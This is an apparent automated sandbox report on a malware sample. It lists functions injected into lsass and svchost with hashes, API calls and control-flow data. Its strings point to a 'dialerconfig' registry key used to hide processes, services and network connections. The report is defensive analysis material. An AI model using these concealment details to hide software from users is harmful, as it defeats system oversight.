                                                                          • Instruction ID: aed91b69a857ebd8f143008fe32e8ddfd8748f94c082e14693789e3aba300262
                                                                          • Opcode Fuzzy Hash: c93f3108f4eee44b47daab660e7931f0d47a2e098f42ae2a4485b6e8a39e27b2
                                                                          • Instruction Fuzzy Hash: 1151C3726593C08BE7628F35E0843DD77A0F348754F64412AEB8D47A95DB38CA45CB81
                                                                          Function 00000140AE8725D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: F]:82
                                                                          • API String ID: 442123175-2422748741
                                                                          • Opcode ID: 6a8b7be37c354b90c3c58bec20d11a7fb2faf8562248a756045ffe1d95056732
                                                                          • Instruction ID: 3bb8fc61173dd34b3669fe6c4d3d244dc259269f42422ba321d249a6f04bbabe
                                                                          • Opcode Fuzzy Hash: 6a8b7be37c354b90c3c58bec20d11a7fb2faf8562248a756045ffe1d95056732
                                                                          • Instruction Fuzzy Hash: B231C0B2754B4086DB21AF1AE8843C973A0F75C794F644026EF4D87B74EB38C951CB81
                                                                          Function 00000140AE8724D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: F]:82
                                                                          • API String ID: 442123175-2422748741
                                                                          • Opcode ID: 9a54b18a8e95195701766736d0ee8c69aa1558165b06a77f74fea7402753075b
                                                                          • Instruction ID: d7c8c6202cc880b7088bfabcacc5dcece4dd317f43bb9b6ae06083d37b49d767
                                                                          • Opcode Fuzzy Hash: 9a54b18a8e95195701766736d0ee8c69aa1558165b06a77f74fea7402753075b
                                                                          • Instruction Fuzzy Hash: 3331F672224B808ADB529F1AE4403C977A0F75C790F744022EF4E83B65EB38C956D741
                                                                          Function 00000140AE86E374 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastModuleName
                                                                          • String ID: F]:82
                                                                          • API String ID: 2776309574-2422748741
                                                                          • Opcode ID: ab0bd3f6f2c4376db8bd34063ca6f8f85c8d865200dc56b2024b30ec5b250ea6
                                                                          • Instruction ID: 013e923800ffb75caf56305a85b8ad5ea486581032202eaa9f2e50a66a4d7950
                                                                          • Opcode Fuzzy Hash: ab0bd3f6f2c4376db8bd34063ca6f8f85c8d865200dc56b2024b30ec5b250ea6
                                                                          • Instruction Fuzzy Hash: D4319832254B808AE722CB26E4443DD77A4F38D7A4F644115EF8C47BB8DB38C944CB82
                                                                          Function 00000140AE867940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessorcapture_previous_context
                                                                          • String ID: F]:82
                                                                          • API String ID: 3936158736-2422748741
                                                                          • Opcode ID: 00146d0d25447094cefaa5d60678f21286d9dab6d2be1c91d195ac6cff3fb679
                                                                          • Instruction ID: 5104a9858c041a76dfeb029c30ea75d9d046b0c3572822f99d436cbf249b340d
                                                                          • Opcode Fuzzy Hash: 00146d0d25447094cefaa5d60678f21286d9dab6d2be1c91d195ac6cff3fb679
                                                                          • Instruction Fuzzy Hash: 9621C074680B4086EB528B1AF86139567A4F7887A4FA00126DE8E837B1EF3CC855D3C2
                                                                          Function 00000140AE8694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                          Function 00000140ADFC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                          Function 00000140ADFC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                          Function 00000140AE861BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                          Function 00000140AE861268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                          Execution Graph

                                                                          Execution Coverage:0.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:81
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 14911 195dd5c1abc 14917 195dd5c1628 GetProcessHeap 14911->14917 14913 195dd5c1ad2 Sleep SleepEx 14915 195dd5c1acb 14913->14915 14915->14913 14916 195dd5c1598 StrCmpIW StrCmpW 14915->14916 14962 195dd5c18b4 14915->14962 14916->14915 14918 195dd5c1648 __std_exception_copy 14917->14918 14979 195dd5c1268 GetProcessHeap 14918->14979 14920 195dd5c1650 14921 195dd5c1268 2 API calls 14920->14921 14922 195dd5c1661 14921->14922 14923 195dd5c1268 2 API calls 14922->14923 14924 195dd5c166a 14923->14924 14925 195dd5c1268 2 API calls 14924->14925 14926 195dd5c1673 14925->14926 14927 195dd5c168e RegOpenKeyExW 14926->14927 14928 195dd5c16c0 RegOpenKeyExW 14927->14928 14929 195dd5c18a6 14927->14929 14930 195dd5c16ff RegOpenKeyExW 14928->14930 14931 195dd5c16e9 14928->14931 14929->14915 14933 195dd5c1723 14930->14933 14934 195dd5c173a RegOpenKeyExW 14930->14934 14983 195dd5c12bc RegQueryInfoKeyW 14931->14983 14994 195dd5c104c RegQueryInfoKeyW 14933->14994 14937 195dd5c175e 14934->14937 14938 195dd5c1775 RegOpenKeyExW 14934->14938 14935 195dd5c16f5 RegCloseKey 14935->14930 14942 195dd5c12bc 11 API calls 14937->14942 14939 195dd5c17b0 RegOpenKeyExW 14938->14939 14940 195dd5c1799 14938->14940 14944 195dd5c17d4 14939->14944 14945 195dd5c17eb RegOpenKeyExW 14939->14945 14943 195dd5c12bc 11 API calls 14940->14943 14946 195dd5c176b RegCloseKey 14942->14946 14947 195dd5c17a6 RegCloseKey 14943->14947 14948 195dd5c12bc 11 API calls 14944->14948 14949 195dd5c180f 14945->14949 14950 195dd5c1826 RegOpenKeyExW 14945->14950 14946->14938 14947->14939 14951 195dd5c17e1 RegCloseKey 14948->14951 14952 195dd5c104c 4 API calls 14949->14952 14953 195dd5c1861 RegOpenKeyExW 14950->14953 14954 195dd5c184a 14950->14954 14951->14945 14957 195dd5c181c RegCloseKey 14952->14957 14955 195dd5c189c RegCloseKey 14953->14955 14956 195dd5c1885 14953->14956 14958 195dd5c104c 4 API calls 14954->14958 14955->14929 14959 195dd5c104c 4 API calls 14956->14959 14957->14950 14960 195dd5c1857 RegCloseKey 14958->14960 14961 195dd5c1892 RegCloseKey 14959->14961 14960->14953 14961->14955 15006 195dd5c14a4 14962->15006 15000 195dd5d6168 14979->15000 14981 195dd5c1283 GetProcessHeap 14982 195dd5c12ae __std_exception_copy 14981->14982 14982->14920 14984 195dd5c148a __free_lconv_num 14983->14984 14985 195dd5c1327 GetProcessHeap 14983->14985 14984->14935 14991 195dd5c133e __std_exception_copy __free_lconv_num 14985->14991 14986 195dd5c1352 RegEnumValueW 14986->14991 14987 195dd5c1476 GetProcessHeap 14987->14984 14989 195dd5c13d3 GetProcessHeap 14989->14991 14990 195dd5c141e lstrlenW GetProcessHeap 14990->14991 14991->14986 14991->14987 14991->14989 14991->14990 14992 195dd5c13f3 GetProcessHeap 14991->14992 14993 195dd5c1443 StrCpyW 14991->14993 15001 195dd5c152c 14991->15001 14992->14991 14993->14991 14995 195dd5c11b5 RegCloseKey 14994->14995 14997 195dd5c10bf __std_exception_copy __free_lconv_num 14994->14997 14995->14934 14996 195dd5c10cf RegEnumValueW 14996->14997 14997->14995 14997->14996 14998 195dd5c114e GetProcessHeap 14997->14998 14999 195dd5c116e GetProcessHeap 14997->14999 14998->14997 14999->14997 15002 195dd5c157c 15001->15002 15003 195dd5c1546 15001->15003 15002->14991 15003->15002 15004 195dd5c155d StrCmpIW 15003->15004 15005 195dd5c1565 StrCmpW 15003->15005 15004->15003 15005->15003 15007 195dd5c14e1 GetProcessHeap 15006->15007 15008 195dd5c14c1 GetProcessHeap 15006->15008 15012 195dd5d6180 15007->15012 15010 195dd5c14da __free_lconv_num 15008->15010 15010->15007 15010->15008 15013 195dd5d6182 15012->15013 15014 195dd59273c 15015 195dd59276a 15014->15015 15016 195dd592858 LoadLibraryA 15015->15016 15017 195dd5928d4 15015->15017 15016->15015

                                                                          Executed Functions

                                                                          Function 00000195DD5C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350
                                                                          Function 00000195DD5C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                            • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                          • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                          • SleepEx.KERNELBASE ref: 00000195DD5C1ADD
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750
                                                                          Function 00000195DD5C3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 57 195dd5c3844-195dd5c384f 58 195dd5c3851-195dd5c3864 StrCmpNIW 57->58 59 195dd5c3869-195dd5c3870 57->59 58->59 60 195dd5c3866 58->60 60->59
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer
                                                                          • API String ID: 0-3528709123
                                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20
                                                                          Function 00000195DD59273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                          Non-executed Functions

                                                                          Function 00000195DD5C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 369 195dd5c2b2c-195dd5c2ba5 call 195dd5e2ce0 372 195dd5c2ee0-195dd5c2f03 369->372 373 195dd5c2bab-195dd5c2bb1 369->373 373->372 374 195dd5c2bb7-195dd5c2bba 373->374 374->372 375 195dd5c2bc0-195dd5c2bc3 374->375 375->372 376 195dd5c2bc9-195dd5c2bd9 GetModuleHandleA 375->376 377 195dd5c2bed 376->377 378 195dd5c2bdb-195dd5c2beb call 195dd5d6090 376->378 380 195dd5c2bf0-195dd5c2c0e 377->380 378->380 380->372 383 195dd5c2c14-195dd5c2c33 StrCmpNIW 380->383 383->372 384 195dd5c2c39-195dd5c2c3d 383->384 384->372 385 195dd5c2c43-195dd5c2c4d 384->385 385->372 386 195dd5c2c53-195dd5c2c5a 385->386 386->372 387 195dd5c2c60-195dd5c2c73 386->387 388 195dd5c2c83 387->388 389 195dd5c2c75-195dd5c2c81 387->389 390 195dd5c2c86-195dd5c2c8a 388->390 389->390 391 195dd5c2c9a 390->391 392 195dd5c2c8c-195dd5c2c98 390->392 393 195dd5c2c9d-195dd5c2ca7 391->393 392->393 394 195dd5c2d9d-195dd5c2da1 393->394 395 195dd5c2cad-195dd5c2cb0 393->395 396 195dd5c2ed2-195dd5c2eda 394->396 397 195dd5c2da7-195dd5c2daa 394->397 398 195dd5c2cc2-195dd5c2ccc 395->398 399 195dd5c2cb2-195dd5c2cbf call 195dd5c199c 395->399 396->372 396->387 402 195dd5c2dbb-195dd5c2dc5 397->402 403 195dd5c2dac-195dd5c2db8 call 195dd5c199c 397->403 400 195dd5c2cce-195dd5c2cdb 398->400 401 195dd5c2d00-195dd5c2d0a 398->401 399->398 400->401 405 195dd5c2cdd-195dd5c2cea 400->405 406 195dd5c2d3a-195dd5c2d3d 401->406 407 195dd5c2d0c-195dd5c2d19 401->407 409 195dd5c2df5-195dd5c2df8 402->409 410 195dd5c2dc7-195dd5c2dd4 402->410 403->402 414 195dd5c2ced-195dd5c2cf3 405->414 416 195dd5c2d3f-195dd5c2d49 call 195dd5c1bbc 406->416 417 195dd5c2d4b-195dd5c2d58 lstrlenW 406->417 407->406 415 195dd5c2d1b-195dd5c2d28 407->415 412 195dd5c2dfa-195dd5c2e03 call 195dd5c1bbc 409->412 413 195dd5c2e05-195dd5c2e12 lstrlenW 409->413 410->409 419 195dd5c2dd6-195dd5c2de3 410->419 412->413 439 195dd5c2e4a-195dd5c2e55 412->439 423 195dd5c2e14-195dd5c2e1e 413->423 424 195dd5c2e35-195dd5c2e3f call 195dd5c3844 413->424 421 195dd5c2d93-195dd5c2d98 414->421 422 195dd5c2cf9-195dd5c2cfe 414->422 425 195dd5c2d2b-195dd5c2d31 415->425 416->417 416->421 427 195dd5c2d5a-195dd5c2d64 417->427 428 195dd5c2d7b-195dd5c2d8d call 195dd5c3844 417->428 429 195dd5c2de6-195dd5c2dec 419->429 432 195dd5c2e42-195dd5c2e44 421->432 422->401 422->414 423->424 433 195dd5c2e20-195dd5c2e33 call 195dd5c152c 423->433 424->432 425->421 434 195dd5c2d33-195dd5c2d38 425->434 427->428 437 195dd5c2d66-195dd5c2d79 call 195dd5c152c 427->437 428->421 428->432 438 195dd5c2dee-195dd5c2df3 429->438 429->439 432->396 432->439 433->424 433->439 434->406 434->425 437->421 437->428 438->409 438->429 444 195dd5c2ecc-195dd5c2ed0 439->444 445 195dd5c2e57-195dd5c2e5b 439->445 444->396 448 195dd5c2e63-195dd5c2e7d call 195dd5c85c0 445->448 449 195dd5c2e5d-195dd5c2e61 445->449 450 195dd5c2e80-195dd5c2e83 448->450 449->448 449->450 453 195dd5c2e85-195dd5c2ea3 call 195dd5c85c0 450->453 454 195dd5c2ea6-195dd5c2ea9 450->454 453->454 454->444 456 195dd5c2eab-195dd5c2ec9 call 195dd5c85c0 454->456 456->444
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                          • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                          Function 00000195DD5C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                          Function 00000195DD5CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00
                                                                          Function 00000195DD5C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
